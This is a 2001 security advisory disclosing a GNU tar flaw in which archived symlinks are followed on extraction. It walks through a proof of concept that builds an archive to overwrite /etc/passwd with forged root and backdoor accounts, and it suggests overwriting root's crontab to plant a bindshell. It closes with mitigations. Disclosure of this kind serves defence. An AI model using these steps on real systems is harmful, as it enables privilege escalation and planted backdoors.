Title        : GNU tar (Tape ARchive) symlinkvulnerability
Author       : Marco van Berkum
Organisation : OBIT b.v.
URL          : http://www.obit.nl
Email        : m.v.berkum@obit.nl
Date         :  06-01-2001

The usefull program tar (Tape ARchive) is used by all UNIX, Linux and
BSD
versions around and is used to ARCHIVE files to disk or tape in a easy
portable format.

While this program has been used for a long time there seemed to be no
need to fix the problem of following symlinks in a archive.
The problem is that tar follows symlinks without questioning whether
this
is a file which is harmless or a file such as /etc/passwd.
This way it will be possible to overwrite ANY file on the system when
untarred as root (NOT DONE).

How can this be done?

Well, you create a directory as test to see the effect of a tarred
symlink

% mkdir test
% cd test
% ln -s /etc/passwd passwd
% ls -al
total 2
drwx--x--x   2 user     user         1024 Aug  7 13:08 ./
drwxr-xr-x  27 user     user         1024 Aug  7 13:08 ../
lrwxrwxrwx   1 user     user           11 Aug  7 13:08 passwd ->
/etc/passwd
%

You now have a symlink to /etc/passwd, next we are going to tar this
symlink.

% tar -cvf test.tar *
% ls -al
total 12
drwx--x--x   2 user     user         1024 Aug  7 13:11 ./
drwxr-xr-x  27 user     user         1024 Aug  7 13:08 ../
lrwxrwxrwx   1 user     user           11 Aug  7 13:08 passwd ->
/etc/passwd
-rw-------   1 user     user        10240 Aug  7 13:11 test.tar
%

Lets see whats in the tarfile now

% tar -tf test.tar
passwd <- AHA a symlink ;)
%

This is not visible as symlink when you do -tf !!
It would be when doing tar -tvf (verbose).

So next we remove the symlink from the testdirectory

% rm passwd

We now have only the tarfile with the symlink to /etc/passwd, next we
create our own passwdfile

% echo "root:our_password_string:0:0::/root:/bin/bash" >passwd
% echo "hax0r:our_password_string:1000:100::/tmp:/bin/bash" >>passwd

Ok now whe have a test.tar and a passfile, all we would have to do is
simply append the passwordfile to the tarfile.

% tar -rf test.tar passwd

Now list it

% tar -tf test.tar
passwd <- AHA a symlink ;)
passwd <- our evil passwdfile
%

Now one can image what happens when this tarfile is extracted as root,
it
will create a symlink to /etc/passwd and overwrite it with ours.
Ofcourse this is possible with all files on the system, one of the most
malicious things to do would be overwriting the rootcrontab and execute
commands that way.
Even programs like bindshell can be executed this way by making a
symlink
to say /tmp, dump the bindshell binary/source to /tmp and make a
rootcrontab pointing to that file by executing or compiling and
executing
it wich will leave us with a rootshell ;)

Solution:

Well, obviously one should NEVER untar files as root, but a patch to
the tarprogram wich enhances tar by asking wether it should follow
symlinks or not would do the trick aswell.

grtz,
Marco van Berkum
--
Sex is like hacking. You get in, you get out,
and you hope you didn't leave something behind
that can be traced back to you.

Marco van Berkum, System Operator/Security Analyst OBIT b.v.
RIPEHANDLE: MB17300-RIPE